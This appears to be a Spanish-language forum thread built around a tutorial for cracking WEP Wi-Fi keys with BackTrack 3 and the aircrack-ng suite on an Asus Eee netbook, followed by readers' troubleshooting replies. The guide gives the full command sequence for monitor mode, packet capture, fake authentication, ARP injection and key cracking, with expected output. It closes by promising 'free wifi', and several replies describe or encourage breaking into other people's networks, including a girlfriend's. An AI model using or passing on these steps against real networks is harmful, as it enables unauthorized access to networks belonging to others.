Esta es una guía para conseguir la claves wep de los puntos wifi protegidos con contraseña usando una distribución de linux llamada Backtrack 3 que instalaremos en un pendrive y nuestro pequeño Asus Eee utilizando Windows xp.

Yo lo he probado con mi Eee 900 y funciona perfectamente, conseguí el password “que había olvidado” de mi casa en menos de 20 minutos.

¿Empezamos?

Requisitos previos:

Necesitaremos el Backtrack 3 versión USB: Descargar desde aqui (http://www.remote-exploit.org/backtrack_download.html).
Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raiz del pendrive (usb flash memory). Por ejemplo e:

En windows vamos al menu de inicio > ejecutar > cmd

Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos enter.

Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter.
Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al enter).

Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar windows.

Bien, ahora empieza lo divertido…

Enchufamos el pendrive en el lado izquierdo del eee, no se porqué pero vá mejor.

Reiniciamos el pc y cuando salga la pantalla gris con el logo del Eee presionamos la tecla Esc.

Nos saldrá un menu azul que nos permitirá seleccionar desde donde arrancar, elegimos obviamente el pendrive (booteable gracias a los pasos anteriores).

Ahora salen unas cosas muy raras y le damos a enter y esperamos. Tranquilos, es solo para “acojonar” luego es bastante facil.

Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto gráfico al windows.

PASO 1:

NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del “menu de inicio” hay un icono cuadrado negro.

En una terminal pones:

airmon-ng start wifi0

a continuación:

airodump-ng ath1

cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes

airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1

donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, recuerdalo.



PASO 2:

Abre una nueva terminal, ya sabes como…

aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

donde:

[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.

Si te sale esto felicidades:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful

Si no, intenta con lo siguiente:

Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1

Y te debería salir algo como esto:

18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet

Si no, olvidate.

Ahora que ya te funciona hay que empezar a inyectar, espero que no tengas miedo de las agujas…



PASO 3:

aireplay-ng -3 -b [AP MAC] ath1 -x 250

Ahora vete a la nevera y preparate una cocacola y unas aceitunas. En un par de minutos empezarás a ver como
la columna DATA de la primera terminal empieza a subir (los números, no es que se mueva de posición ¬¬).

Espera hata tener unos 40.000 más o menos y abre una tercera terminal.



PASO 4:

Quiero mi clave yaaaarl!!!

aircrack-ng -z -b [AP MAC] [filename*.cap]

En lo de filename deberias poner lo que te dije antes, en tu caso sería casa.cap o lo que hayas puesto.

Espera otro poquito, y ya te aparecerá la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito
y disfruta de tu wifi gratis.

Gracias a http://www.georgehafiz.co.uk/aircrackeeepc.php

Y te debería salir algo como esto.... Si no, olvidate.

Jajaja, que grande :0=:0=
Una vez con backtrack puedes usar el manual de j8 (http://foro.hackhispano.com/showthread.php?t=17488), o consultar la wiki de la suite aircrack para manejarte con todo su potencial

PD: WLANDECRYPTER+AIRCRACK= WIFI :D

B.Dias Luk ; te comento mi primera experencia para instalar los programas para consegir las claves WEP.

El programa wifilax no me baja del todo , y no soy capaz de bajar ni de la pagina original ni del foro.Este programa para que es para reconocer el receptor wifi mio , yo los drives tengo los originales lo he comprado hace poco.

Segundo el otro programa BT 3 lo he bajado , hago lo que dice la pagina de instalarlo en el Pendrive para que arranque como bootable no ha y manera de hacerlo lo arranco y me arranca el windows.

Ya me comentaras que pasos seguir o como efectuar , parece facil pero es dificil.Gracias de antemano

Mi antena receptora wifi es Realtek RTL8187 que me aconsejas o como lo puedo efectuar???

Tengo un Asus Eee PC 901 e intento arrancar Backtrack 3.

Despues de todo la escritura del arranque me pide un login y contraseña:"root" y "toor"

despues escribo "startx" y me da error

Fatal server error:
AddScreen/screeninit failed for driver 0...........

Prueba con fluxbox, para iniciar este sistema de escritorio en vez de KDE.

"Try moving around your mode lines on Depth 16 to "800x600" "640x480" "1024x768" see if that helps the "size" issue. "

Si la profundidad de color predeterminada no es 16, cámbiala y pon 16.

http://www.linuxquestions.org/questions/slackware-14/addscreenscreeninit-failed-for-driver-0-35019/

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

Hola q tal LUK he leido todo el procedimiento q escribes y m parece excelente, muy descriptivo y todo va muy bien hasta que llego al airdrump.

Te describo q pasa y ojala q m puedas echar la mano, al escribir el airmon-ng start wifi aparece mi tarjeta inalambrica y ahi no hay problema.
Pero cuando al escribir el airodump-ng ath1 no me muestra ninguna red, aun asi hago sigo adelante
y aqui es donde reside mi mayor duda cuando pongo el airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1 //obviamente sin corchetes//
aparece un mensaje q entre todo lo q dice aparece "ath1 no device such" y como apenas estoy aprendiendo linux no se que hacer, he tratado de configurarlo poniendo iwconfig q la verdad no se si se deba y aparece lo siguiente
# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

pero al buscar el asistente del wifi y lo abro desde el escritorio y m aparce bien y es mas me detecta mi red y algunas otras, al abrir el manager aparece la tarjeta desactivada pero se activa en el momento y tambien me registra todas las redes.

Nose que se debe hacer si se debe activar el ath1, ponerlo modo de monitor, instalar algun controlador o no se q mas, agradeceria la ayuda q m puedan dar
y si lo explican detalladamente estaria mas q agradecido. Cabe decir q se m ha metido esa idea de lograr entrar a mi red sin teclearle la clave y no pienso dejar q m gane, jajaja.

Gracias :)

tambien para gente como yo que el wifislax no soporta la tarjeta wifi (intel 4965agn) se puede bajarel airodump-ng y aireplay-ng, y hackear desde tu distribucion linux que uses, yo probe la wep de la casa de mi novia y la averigue, todo desde mi debian

los pasos son los mismos nada mas que instale el software mediante apt

Saludos

Tienes toda la razón ancabi ;)

Yo siempre he preferido debian para estos menesteres. Las distribuciones especializadas presentan la ventaja de incluír la mayoría de los controladores, pero una vez sabes cuáles necesitas, lo mejor es compilártelos y usar los programas en tu debian :)

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

he realizado los pasos que dijiste en la consola.
al poner airodump-ng start wifi0 Me sale esto
Interface Chipset Driver

pero nada mas...- ningun dato bajo éstos caracteres

sigo y pongo airodump-ng aht1

y me dice ésto airodump-ng -- help´´ for help
y YA está
QUE PUEDE PASAR..?
graciasss

No puedes capturar directamente en wifi0, por eso el primer error.

Y lo segundo es porque la sintaxis es incorrecta, debes pasar más parámetros a airodump-ng.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

He echao a andar la backtrack3 en el asus eee 901, pero da error al arrancar el modo grafico, si en el boot elijo el driver vesa si m arranca. Pero la resolucion del escritorio me sale a 1024x840 y como el asus es 1024x600 hay parte del escritorio q no m sale en pantalla....

¿Alguna forma de arreglarlo?

man xorg.conf

Cambia la resolución manualmente y reinicia el servidor gráfico.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

wenas:

para quien pueda ayudarme.
1. el entorno parecido a windows no me sale, me sale una ventana parecida a dos para meter comandos.

2. cuanod llego a airmon-ng start wifio sale:
interface: wlan0 chipset: intel 4965 a/b/g/n fdriver iwl4967 - [phy0]

3. cuando meto airodump-nd ath1 sale:
interface ath1:
ioctl(siocgifindex) failed: no such device.

el programa lo copio en un pendrive y despues en u portatil, por favor que alguien me ayude que no entiendo casi nada de linux
email: editado
gracias.

Si la interfaz es wlan0, el comando
airodump-ng ath1, y debería ser
airodump-ng wlan0

Los comandos más básicos en gnu/Linux, para la configuración de redes inalámbricas, son ifconfig e iwconfig. Lee sus páginas de manual atentamente para saber en qué consisten.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

primero cuando iniciamos el backtrack 3 la opcion para ver los graficos es el VESA .... y antes de iniciar el backtrack he leido (lo tengo que provar) que lo que hay que hacer es mirar que este siempre activado el wireless en la bios.... vaya que en la opcion del wireless no sea el restore sii no el enabled

felicidades, muy buena la info...

hola perdonar mi imnorancia pero esto que es Asus Eee
bueno me contesyo mismo el colega google se chivo pero con un pc normal tambien se puede no ?

El asus es simplemente un NetBook, es decir un mini-pc diseñado para ser ligero y portatil.
Hay muchos otros, Acer One, Medion, HP .........
Si puedes usar ese sistema en otro portatiles, yo testee el Asus Lite que usan los Acer One como sistema operativo Linux, pero algunos llevan simplemente XP.

PD: Si lo preguntas por Backtrack lo puedes usar en cualquier equipo.

hey tengo un proble cuando pongo airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1 me sale este problem
notice:you specified ''-bssid''.DId you man ''--bssid'' instead?
Notice channel range already given
Airodump-ng -- help for help

ya lo solucioe donde pone -bssid puse -b y arreglado

B.Dias Luk ; te comento mi primera experencia para instalar los programas para consegir las claves WEP.

El programa wifilax no me baja del todo , y no soy capaz de bajar ni de la pagina original ni del foro.Este programa para que es para reconocer el receptor wifi mio , yo los drives tengo los originales lo he comprado hace poco.

Segundo el otro programa BT 3 lo he bajado , hago lo que dice la pagina de instalarlo en el Pendrive para que arranque como bootable no ha y manera de hacerlo lo arranco y me arranca el windows.

Ya me comentaras que pasos seguir o como efectuar , parece facil pero es dificil.Gracias de antemano

Mi antena receptora wifi es Realtek RTL8187 que me aconsejas o como lo puedo efectuar???

primero que todo entrar al setup de tu pc y activar la opcion de inicio desde un dispositivo de este tipo (ojo que no todos los pcs tienen esta caracteristica) si no, lo unico que te queda es iniciarlo desde un cd. a mi me paso eso y tuve que hacerlo asi, ademas de eso lo hice desde mi pc de escritorio, al cual le conecté una tarjeta pci D-Link dwa-510 (super económica) y segui los pasos al pie de la letra de este manual. te recomiendo si quieres hacerlo de esta manera, que ocupes esta tarjeta o al menos te averigues si en driver del chipset de la tarjeta que tienes esta soportado. en el caso de la mia el chipset es un ralink (rt61)

primero que todo entrar al setup de tu pc y activar la opcion de inicio desde un dispositivo de este tipo (ojo que no todos los pcs tienen esta caracteristica) si no, lo unico que te queda es iniciarlo desde un cd. a mi me paso eso y tuve que hacerlo asi, ademas de eso lo hice desde mi pc de escritorio, al cual le conecté una tarjeta pci D-Link dwa-510 (super económica) y segui los pasos al pie de la letra de este manual. te recomiendo si quieres hacerlo de esta manera, que ocupes esta tarjeta o al menos te averigues si en driver del chipset de la tarjeta que tienes esta soportado. en el caso de la mia el chipset es un ralink (rt61)

consideraciones para hackear mediante BackTrack:
1.- tu tarjeta debe poder pasar de modo Enabled a Monitor
2.- poder inyectar trafico (no indispensable) para poder usar Aireplay-ng
3.- para el paso 2, debes estar cerca del Ap, sino, no funciona
4.- de preferencia hackea wifis que no necesitan nombre de usuario y contraseña (PPPoE) porque backtrack solo obtiene la clave WEP, asi que ya no es culpa de Back Track si no te puedes conectar aun si puedes sacar la clave WEP, ni mucho menos culpa de tu pc.

Hola, tengo un asus y el programa me va estupendamente con el canal 1, pero cuando uso otro canal me da error, dicho de otra forma, solo puedo usar señales con el canal 1, alguien me puede dar alguna idea de cual pude ser el problema, gracias

Tengo un Asus Eee PC 901 e intento arrancar Backtrack 3.

Despues de todo la escritura del arranque me pide un login y contraseña:"root" y "toor"

despues escribo "startx" y me da error

Fatal server error:
AddScreen/screeninit failed for driver 0...........

Buenas a todos, me pasa lo mismo me podeis decir que es lo que hay que hacer paso por paso?? llego a toor y root pero luego no se que hacer. Soy primeriza en esto y estoy trabajando con un eeepc 1000H

Hola a todos!

Pues yo me quedo en el ultimo paso, pilla unas 40 mil,

abro la tercera terminal, tecleo, eso, y me pone que revise mi bssi, alguna idea?

Gracias!

hola una cosa tengo en el portatil el vista y si uso el backtrack me dara problemas salu2

Perdonen la ignorancia pero tengo un pendrive en el cual eh puesto tu archivo... instale todo y cuando lo puse en mi laptop toshiba no funko... tiene que ser precisamente un Asus Eee?

hola perdonar mi imnorancia pero esto que es Asus Eee
bueno me contesyo mismo el colega google se chivo pero con un pc normal tambien se puede no ?

Claro que se puede desde un pc de escritorio, yo lo hago desde mi desktop pc, le compre una tarjeta dlink dwa-510 con chipset ralink y funciona sin problemas :0=